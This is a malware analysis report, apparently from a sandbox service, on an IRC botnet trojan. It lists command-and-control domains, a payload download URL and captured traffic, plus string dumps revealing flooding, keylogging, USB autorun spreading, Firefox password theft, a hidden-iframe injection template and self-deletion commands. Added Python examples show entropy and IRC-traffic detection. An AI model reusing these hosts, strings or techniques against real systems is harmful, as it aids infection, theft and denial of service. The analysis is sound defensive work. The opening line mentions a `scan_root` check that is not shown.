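Pointing `scan_root` at each mounted removable volume gives a quick check for the worm's footprint; the `shell\*\command` case is included because AutoRun honours those verbs as well as `open` and `shellexecute`.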

VersionInfo

Company Name:
Product Name:
Product Version: 66.72.12.25
Legal Copyright: Copyright (c) 2014
Legal Trademarks:
Original Filename: sokidsmfsdfsdfs.exe
Internal Name: sokidsmfsdfsdfs.exe
File Version: 66.72.12.25
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 49252 49664 4.34574 0480df25e05b678afc1c4fe541b6f140
.reloc 65536 12 512 0.056519 bf805fbb74b19f1e2e0bd1f15591e752
.rsrc 73728 2588 3072 2.54019 5dfb93c34d83e1f1621fa635f022a43e
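
How the per-section entropy column above is computed, as an added example that is not the Lavasoft tool's code: Shannon entropy in bits per byte over each section's raw bytes, with a packed/encrypted verdict at an assumed threshold of 7.0. The three sample sections are constructed to resemble the table (a low-variety code-like section, a near-empty .reloc, and a high-entropy section of the kind a packer produces); they are not this sample's bytes.

```python
"""Per-section Shannon entropy with a packed-section heuristic.

Added example, not part of the Lavasoft report. The sections are constructed
stand-ins; the 7.0 bits/byte cut-off is an assumed, commonly used threshold.
"""
import math
import random
from collections import Counter

PACKED_THRESHOLD = 7.0  # assumption: sections at or above this look compressed/encrypted


def shannon_entropy(data):
    """Entropy of a byte string in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_section(name, data):
    """Return the row an analysis report would print for one section."""
    h = shannon_entropy(data)
    return {"name": name, "raw_size": len(data), "entropy": round(h, 5), "packed": h >= PACKED_THRESHOLD}


def build_sample_sections():
    """Construct three sections with deterministic content (seeded RNG)."""
    rnd = random.Random(20150113)
    opcodes = b"\x55\x8b\xec\x83\xc4\xe8\xc3\x00"                 # eight byte values only
    text = bytes(rnd.choice(opcodes) for _ in range(4096))
    reloc = b"\x00\x30\x00\x00\x0c\x00\x00\x00" + b"\x00" * 504  # mostly zero padding
    packed = bytes(rnd.getrandbits(8) for _ in range(8192))      # what a packer's output looks like
    return [(".text", text), (".reloc", reloc), (".packed", packed)]


def report(sections=None):
    """Classify each section; return the rows in input order."""
    return [classify_section(n, d) for n, d in (sections or build_sample_sections())]


if __name__ == "__main__":
    for row in report():
        print("{name:<8} {raw_size:>6} {entropy:>8.5f} {packed}".format(**row))
```

Real sections come from the PE section table (raw offset and raw size); feeding those slices to `report` reproduces the kind of table above. A .NET image such as this one has a tiny .reloc with near-zero entropy, which is normal and not an indicator on its own.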

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
0aaed1ed0c5752822e49e2fcac00792d

URLs

URL IP
hxxp://icetelecoms.co.uk/msn/msn.exe 212.1.215.86
root2.zapto.org 90.147.119.154


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN IRC Nick change on non-standard port
ET TROJAN IRC Channel JOIN on non-standard port
ET TROJAN IRC Bot Download http Command
ET CURRENT_EVENTS SUSPICIOUS IRC - PRIVMSG *.(exe|tar|tgz|zip) download command
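
The four verdicts above as detection logic, written as an added example that is not part of the Lavasoft report or of the Emerging Threats ruleset: a Python routine that takes one client-to-server flow (destination port plus the text lines sent) and raises the same kinds of alerts, while also pulling out nicks that follow the `{BoT-%s-%s}%s` format seen in the string dump. The session below is constructed; the nick and the USER line follow the dump's format strings (`new{BoT-XP-USA}508870`, `%s %s "" "TsGh" :%s`), but the destination port, the channel name, the `.download` command word and the URL are assumptions.

```python
"""Detection logic for the IRC C2 behaviour flagged by the IDS verdicts above.

Added example, not part of the Lavasoft report or of the ET ruleset. The
session below is constructed from the format strings in the dump
("{BoT-%s-%s}%s", "%s %s \"\" \"TsGh\" :%s", NICK, JOIN, PRIVMSG); the
destination port, the channel name, the ".download" command word and the
download URL are assumptions.
"""
import re

# Assumption: ports conventionally used by IRC; anything else counts as non-standard.
STANDARD_IRC_PORTS = frozenset(range(6665, 6670)) | {7000}
# Nick format taken from the "{BoT-%s-%s}%s" strings in the dump.
BOT_NICK_RE = re.compile(r"\{BoT-[^}]*\}\d+")
# PRIVMSG whose text carries a URL ending in an archive/executable extension.
DL_CMD_RE = re.compile(r"PRIVMSG\s+\S+\s+:.*?(https?://\S+\.(?:exe|tar|tgz|zip))\b", re.I)


def strip_prefix(line):
    """Drop the leading ':prefix ' of a server-originated IRC line."""
    if line.startswith(":") and " " in line:
        return line.split(" ", 1)[1]
    return line


def inspect_irc_flow(dst_port, lines):
    """Return (alerts, bot_nicks) for one client->server TCP flow given as text lines."""
    alerts, nicks = [], []
    non_standard = dst_port not in STANDARD_IRC_PORTS
    for raw in lines:
        body = strip_prefix(raw.strip())
        parts = body.split(" ", 1)
        cmd = parts[0].upper()
        if cmd == "NICK" and len(parts) == 2:
            nick = parts[1].strip().lstrip(":")
            if BOT_NICK_RE.search(nick):
                nicks.append(nick)
            if non_standard:
                alerts.append("IRC Nick change on non-standard port")
        elif cmd == "JOIN" and non_standard:
            alerts.append("IRC Channel JOIN on non-standard port")
        elif cmd == "PRIVMSG":
            m = DL_CMD_RE.search(body)
            if m:
                alerts.append("IRC download command in PRIVMSG: " + m.group(1))
    return alerts, nicks


# Constructed session: port, channel, command word and URL are assumptions; the
# nick and the USER line follow the format strings in the dump.
SAMPLE_PORT = 1863
SAMPLE_LINES = [
    "NICK new{BoT-XP-USA}508870",
    'USER 508870 "" "TsGh" :508870',
    "JOIN #ganja",
    ":op!op@c2.invalid PRIVMSG new{BoT-XP-USA}508870 :.download http://example.invalid/msn/msn.exe",
    "PRIVMSG #ganja :[Download]: Executed Successfully",
]


def analyze_sample():
    """Run the detector over the constructed session."""
    return inspect_irc_flow(SAMPLE_PORT, SAMPLE_LINES)


if __name__ == "__main__":
    alerts, nicks = analyze_sample()
    print("bot nicks:", nicks)
    for a in alerts:
        print("ALERT:", a)
```

The port-based alerts disappear when the same session runs on 6667, which is exactly the weakness of the two "non-standard port" rules; the download-command rule and the nick pattern still fire, so a detection for this family should lean on those.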

Traffic

GET /msn/msn.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icetelecoms.co.uk
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 12:39:48 GMT
Server: Apache
Last-Modified: Sun, 11 Jan 2015 18:17:04 GMT
ETag: "5b50f11-28000-50c64659b4208"
Accept-Ranges: bytes
Content-Length: 163840
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
[Response body omitted: a Win32 PE executable (MZ and PE headers, "This program cannot be run in DOS mode", a "Rich" header, a .text section and an import table naming ADVAPI32.dll, KERNEL32.dll, NTDLL.DLL, GDI32.dll, USER32.dll, COMCTL32.dll and VERSION.dll); the remainder of the dump is non-printable data.]

<<< skipped >>>

Strings from dumps (the servers the Trojan connects to are listed in the URLs section above):

msconfig.exe_1532:

.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
(Spanish lure text; the character lost between "a" and "o" is the "ñ" of "año". In English: "Hello, 2012, the end of the world: they have already confirmed that a meteorite is coming and have said nothing. Here you can see some NASA images of the places where the Earth is deteriorating; only a year is left. Find out more at the following link")
BeeSwarm.exe
MAPI32.DLL
*.html
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s
new{BoT-XP-USA}508870
\google_cache2.tmp

Ganja145.exe_1436:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
advpack.dll
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
hhh.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
33333330
3333333
33333333
~hq.Ol
%s,LYR}
CG.WT
Ul;y%S
.MPcu
4Ys-o}(
%xmvB
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process <%s>. Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C:<Cmd> -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
6.00.2900.5512 (xpsp.080413-2105)
WEXTRACT.EXE
Windows
Operating System
6.00.2900.5512

msconfig.exe_1532_rwx_00350000_0000B000:

.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
(Spanish lure text; the character lost between "a" and "o" is the "ñ" of "año". In English: "Hello, 2012, the end of the world: they have already confirmed that a meteorite is coming and have said nothing. Here you can see some NASA images of the places where the Earth is deteriorating; only a year is left. Find out more at the following link")
BeeSwarm.exe
MAPI32.DLL
*.html
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s

msconfig.exe_1532_rwx_009F0000_0000B000:

.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
BeeSwarm.exe
MAPI32.DLL
*.html
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s

NESbot.exe_612:

.text
`.rdata
@.data
VkKeyScanA
keybd_event
EnumWindows
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C   6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C   2008 KeyGen.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Crack.exe
Windows Vista Keygen
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
keygen
KeyGen.exe
shlwapi.dll
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d
KeyGen
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons2.txt
signons3.txt
pstorec.dll
%s %s %s:%s
http:/
https:/
kWindows Security Alert
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
TASKMGR.EXE
%s gained access..
%s did not break in..
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s <%i> out.
%s error: no user at: <%i>
%s invalid slot: <%i>
%s kill: <%d> threads
%s no threads
%s killed thread: <%s>
%s failed kt: <%s>
%s %s already running: <%d>.
%s faild 2 start %s, err: <%d>.
%s status: %s.
uptime: %s,
for: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
%s Advapi.dll Failed
%s PStore.dll Failed.
%s Main thread.
%s RuC.
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s Thread Disabled.
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s %s
%s seeding!
%s unable to download file
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s updating from %s
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error: <%d>
%s Failed to create process: "%s", error: <%d>
%s Created process: "%s", PID: <%d>
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error: <%d>
Ping Timeout? (%d-%d)%d/%d
PASS %s
NICK %s
USER NESv5 * 0 :%s
QUIT %s
JOIN
PRIVMSG
NICK
PONG %s
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
MODE %s %s
MODE %s %s %s
Torrent 1.8.1
%d.%d.%d.%d
kernel32.dll
user32.dll
advapi32.dll
RegEnumKeyExA
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
FtpGetFileA
FtpPutFileA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
netapi32.dll
dnsapi.dll
iphlpapi.dll
GetTcpTable
GetUdpTable
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
userenv.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
%s%%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
winsvc32.exe
DataBlock.exe
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

winsvc32.exe_344:

.text
`.rdata
@.data
VkKeyScanA
keybd_event
EnumWindows
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C   6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C   2008 KeyGen.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Crack.exe
Windows Vista Keygen
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
keygen
KeyGen.exe
shlwapi.dll
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d
KeyGen
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons2.txt
signons3.txt
pstorec.dll
%s %s %s:%s
http:/
https:/
kWindows Security Alert
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
TASKMGR.EXE
%s gained access..
%s did not break in..
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s <%i> out.
%s error: no user at: <%i>
%s invalid slot: <%i>
%s kill: <%d> threads
%s no threads
%s killed thread: <%s>
%s failed kt: <%s>
%s %s already running: <%d>.
%s faild 2 start %s, err: <%d>.
%s status: %s.
uptime: %s,
for: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
%s Advapi.dll Failed
%s PStore.dll Failed.
%s Main thread.
%s RuC.
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s Thread Disabled.
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s %s
%s seeding!
%s unable to download file
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s updating from %s
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error: <%d>
%s Failed to create process: "%s", error: <%d>
%s Created process: "%s", PID: <%d>
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error: <%d>
Ping Timeout? (%d-%d)%d/%d
PASS %s
NICK %s
